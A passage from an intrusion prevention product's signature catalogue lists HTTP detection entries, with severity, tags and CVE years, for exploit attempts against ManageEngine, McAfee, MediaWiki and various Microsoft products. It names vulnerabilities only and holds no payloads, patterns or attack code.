HTTP_CSU-Manageengine-Desktopcentral-SQL-Injection

About this situation: An attempt to exploit a ManageEngine DesktopCentral SQL Injection detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1399-5242
Vulnerability: Manageengine-Desktopcentral-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-DeviceExpert-User-Credentials-Disclosure

About this situation: An attempt to exploit a Manageengine DeviceExpert User Credentials Disclosure vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DeviceExpert, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Manageengine-DeviceExpert-User-Credentials-Disclosure
Description:
Back to top

HTTP_CSU-Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ManageEngine EventLog Analyzer detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine EventLog Analyzer, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Manageengine-EventLog-Analyzer-Hostdetails-Information-Disclosure
Description:
Back to top

HTTP_CSU-Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine Applications Manager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-Multiple-Products-Customername-SQL-Injection-Remote-Code-Execution
Description:
Back to top

HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine IT360 detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine OpManager, ManageEngine Social IT Plus, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-Multiple-Products-Filecollector-Directory-Traversal
Description:
Back to top

HTTP_CSU-Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine IT360 detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine OpManager, ManageEngine Social IT Plus, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-Multiple-Products-Filecollector-Dopost-Directory-Traversal
Description:
Back to top

HTTP_CSU-Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine Applications Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: Manageengine-Multiple-Products-It360sputil-Resids-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine IT360 detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine NetFlow, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-NetFlow-Analyzer-And-IT360-DisplayChartPDF-Directory-Traversal
Description:
Back to top

HTTP_CSU-Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine OpManager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Manageengine-Opmanager-Agentdetailsutil-Agentkey-SQL-Injection
Description:
Back to top

HTTP_CSU-Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Zoho Corporation ManageEngine ServiceDesk detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Zoho Corporation ManageEngine ServiceDesk, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Manageengine-Servicedesk-Downloadfileservlet-Information-Disclosure
Description:
Back to top

HTTP_CSU-McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error

About this situation: An attempt to exploit a vulnerability in McAfee Asset Manager detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, McAfee Asset Manager, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: McAfee-Asset-Manager-Reportsaudit.jsp-Input-Validation-Error
Description:
Back to top

HTTP_CSU-McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in McAfee Cloud Identity Manager detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee Cloud Identity Manager, McAfee Cloud Single Sign On, McAfee Intel Expressway Cloud Access 360-SSO, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-578-5211
Vulnerability: McAfee-Cloud-Single-Sign-On-Extensionaccessservlet-Directory-Traversal
Description:
Back to top

HTTP_CSU-MediaWiki-URI-Remote-Command-Execution

About this situation: An attempt to exploit a MediaWiki URI Remote Command Execution vulnerability detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, MediaWiki, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: MediaWiki-URI-Remote-Command-Execution
Description:
Back to top

HTTP_CSU-Messaging-Gateway-Management-Console-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Symantec Messaging Gateway detected
Context: HTTP Request URI
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Messaging Gateway, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1765-5242
Vulnerability: Symantec-Messaging-Gateway-Management-Console-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Metasploit-Handler-DoS

About this situation: An attempt to exploit a vulnerability in Metasploit detected.
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Metasploit, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Metasploit-Handler-DoS
Description:
Back to top

HTTP_CSU-Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, Silverlight, MS2011-10, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-.NET-Framework-Silverlight-Class-Inheritance-Code-Execution
Description:
Back to top

HTTP_CSU-Microsoft-ASP.NET-Application-Folder-Information-Disclosure

About this situation: Detects information disclosure exploits against Microsoft .NET Framework
Context: HTTP Request URI
Severity: 2
Tags: Windows, x86, Microsoft .NET Framework, MS2006-07, CVE2006, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-186-2032
Vulnerability: HTTP-Microsoft-ASP.NET-Application-Folder-Information-Disclosure
Description:
Back to top

HTTP_CSU-Microsoft-ASP.NET-Error-Handling-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft .NET Framework, IIS 7.0, MS2009-08, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1739-5242
Vulnerability: Microsoft-ASP.NET-Error-Handling-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2011-12, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-1354-5242
Vulnerability: Microsoft-ASP.NET-Forms-Authentication-Insecure-Redirect
Description:
Back to top

HTTP_CSU-Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability

About this situation: Detected an attempt to exploit a vulnerbility in Microsoft .NET Framework
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2007-07, CVE2007, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-186-2032
Vulnerability: Microsoft-ASP.NET-Null-Byte-Termination-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure

About this situation: A Microsoft ASP.NET PKCS Padding Information Disclosure vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft ASP.NET, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-ASP.NET-PKCS-Padding-Information-Disclosure
Description:
Back to top

HTTP_CSU-Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977

About this situation: An attempt to exploit a vulnerability in Microsoft Chart Control detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Chart Control, MS2011-08, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Chart-Control-Information-Disclosure-CVE-2011-1977
Description:
Back to top

HTTP_CSU-Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975

About this situation: An attempt to exploit a vulnerability in Microsoft Data Access Components detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2011-08, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
Description:
Back to top

HTTP_CSU-Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1380-5242
Vulnerability: Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523
Description:
Back to top

HTTP_CSU-Microsoft-Exchange-SSRF-CVE-2022-41040

About this situation: An attempt to exploit a SSRF vulnerability in Microsoft Exchange
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2022, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1509-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Microsoft-Exchange-SSRF-CVE-2022-41040
Description:
Back to top

HTTP_CSU-Microsoft-Exchange-XSS-CVE-2015-1632

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2015-03, CVE2015, Windows not specific, Exchange Server not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Microsoft-Exchange-XSS-CVE-2015-1632
Description:
Back to top

HTTP_CSU-Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft FrontPage detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft FrontPage, CVE2000, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-925-5242
Vulnerability: Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service
Description:
Back to top

HTTP_CSU-Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass-URI

About this situation: This fingerprint sets a variable if a certain string is found in the URI
Context: HTTP Request URI
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Description:
Back to top

HTTP_CSU-Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Information Services detected.
Context: HTTP Request URI
Severity: 2
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Vulnerability: Microsoft-IIS-Cachuri-Tree_Hash_Table-Denial-of-Service
Description:
Back to top

HTTP_CSU-Microsoft-IIS-Cmdasp.asp-Access

About this situation: Access to Microsoft IIS Cmdasp.asp file was detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Microsoft-IIS-Cmdasp.asp
Description:
Back to top

HTTP_CSU-Microsoft-IIS-Directory-Authentication-Security-Bypass

About this situation: An attempt to exploit a security bypass vulnerability in Microsoft Internet Information Services detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, IIS, CVE2010, Any Operating System not specific, IIS not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-321-4219
Last changed: sgpkg-ips-321-4219
Vulnerability: Microsoft-IIS-Directory-Authentication-Security-Bypass
Description:
Back to top

HTTP_CSU-Microsoft-IIS-Malformed-Url

About this situation: Detects malformed URL attacks against IIS
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS, MS2000, MS2007-07, CVE2000, CVE2005, Windows not specific, IIS not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1344-5242
Vulnerability: HTTP-IIS-Malformed-Url-Denial-Of-Service
HTTP-Internet-Information-Server-Phone-Book-Service-BOF
Description:
Back to top

HTTP_CSU-Microsoft-IIS-Multiple-Extensions-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Information Services (IIS) detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS 6.0, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Microsoft-IIS-Multiple-Extensions-Security-Bypass
Description:
Back to top

HTTP_CSU-Microsoft-IIS-UNC-Path-Disclosure-Vulnerability

About this situation: HTTP-request to .ida or .idq -files detected
Context: HTTP Request URI
Severity: 2
Tags: Windows 2000, Any Hardware, IIS 4.0, CVE2000, Windows 2000 not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-662-5211
Vulnerability: Microsoft-IIS-UNC-Path-Disclosure-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-IIS-UNC-Path-Source-Disclosure

About this situation: An attempt to exploit a vulnerbility in Microsoft IIS detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, MS2000, CVE2000, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-254-3038
Vulnerability: Microsoft-IIS-UNC-Path-Source-Disclosure
Description:
Back to top

HTTP_CSU-Microsoft-IIS-WebDAV-Unicode-Authentication-Bypass-6

About this situation: Vulnerability in IIS allows unauthorized access
Context: HTTP Request URI
Severity: 10
Tags: Windows, x86, IIS 6.0, MS2009-06, CVE2009, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1010-5242
Vulnerability: HTTP-Microsoft-IIS-Unicode-WebDAV-Authentication-Bypass
Description:
Back to top

HTTP_CSU-Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, MS2012-02, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows XP, Windows 2003, Any Hardware, MS2010-12, CVE2010, Windows XP not specific, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-362-4219
Vulnerability: Microsoft-Internet-Connection-Wizard-Insecure-Loading-CVE-2010-3144
Description:
Back to top

HTTP_CSU-Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow

About this situation: A Microsoft Internet Explorer Compressed Content URL Heap Overflow vulnerability
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Microsoft-Internet-Explorer-Compressed-Content-URL-Heap-Overflow
Description:
Back to top

HTTP_CSU-Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, CVE2006, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow
Description:
Back to top

HTTP_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-376-4219
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
Description:
Back to top

HTTP_CSU-Microsoft-Lync-Information-Disclosure-CVE-2014-1923

About this situation: Detected attempt to exploit a vulnerability in Microsoft Lync
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Lync Server 2010, Microsoft Lync Server 2013, MS2014-06, CVE2014, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: Microsoft-Lync-Information-Disclosure-CVE-2014-1923
Description:
Back to top

HTTP_CSU-Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Request URI
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008, Any Hardware, MS2012-01, CVE2012, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-434-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Microsoft-Object-Packager-Insecure-Executable-Launching-Vulnerability
Description:
Back to top

HTTP_CSU-Microsoft-Office-Groove-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Office Groove detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Groove 2007, MS2011-03, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-382-4219
Vulnerability: Microsoft-Office-Groove-Insecure-Library-Loading
Description:
Back to top

HTTP_CSU-Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029

About this situation: A maliciously named ppt file detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2010-02, CVE2010, Windows not specific, Microsoft PowerPoint not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-284-4219
Last changed: sgpkg-ips-284-4219
Vulnerability: Microsoft-Office-PowerPoint-Remote-Code-Execution-CVE-2010-0029
Description:
Back to top

HTTP_CSU-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-12, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
Description:
Back to top

HTTP_CSU-Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Windows Server detected
Context: HTTP Request URI
Severity: 7
Tags: Windows 2008 R2, Any Hardware, MS2011-08, CVE2011, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-408-4219
Vulnerability: Microsoft-Remote-Desktop-Web-Access-Cross-Site-Scripting
Description:
Back to top

HTTP_CSU-Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976

About this situation: An attempt to exploit a vulnerability in Report Viewer detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, Microsoft Report Viewer, MS2011-08, CVE2011, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Report-Viewer-XSS-Vulnerability-CVE-2011-1976
Description:
Back to top

HTTP_CSU-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Request URI
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2023-06, CVE2023, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
Description:
Back to top

HTTP_CSU-Microsoft-SharePoint-Directory-Traversal-Vulnerability

